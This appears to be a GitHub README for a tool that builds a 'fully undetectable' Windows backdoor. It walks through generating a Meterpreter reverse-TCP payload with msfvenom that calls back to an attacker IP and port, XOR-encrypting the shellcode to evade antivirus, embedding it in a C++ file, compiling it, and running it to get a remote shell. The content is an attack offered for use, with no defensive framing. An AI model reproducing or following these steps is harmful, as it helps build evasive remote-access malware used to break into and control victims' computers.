
Create a fully undetectable backdoor with simple steps.

Primary LanguageC++

🔒 Generate FUD backdoor with a Python Crypter 🔒

Follow the steps bellow to generate a crypted shellcode that can be used on a C++ executable.

Clone the repository

sudo git clone https://github.com/3ct0s/fud-backdoor.git
cd fud-backdoor

Generate The ShellCode

msfvenom -p windows/x64/meterpreter_reverse_tcp -e x86/shikata_ga_nai -i 10 LHOST=(IP) LPORT=(PORT) -f raw -o raw.txt

Encode the ShellCode With the XOR Encryption

python xor_encryptor.py raw.txt > xor_shellcode.txt

Add the crypted shellcode on main.cpp

Now that you have the encrypted shellcode you need to add it on the main.cpp file just like this:

char b[] = /*xor_shellcode*/

Compile the main.cpp file

There is no specific way to do this, all you need to do is compile the C++ code into a windows executable. Here are ways to do that. https://cutt.ly/BBOXP797

Execute the backdoor

Now you can execute the backdoor and enjoy the metepreter shell


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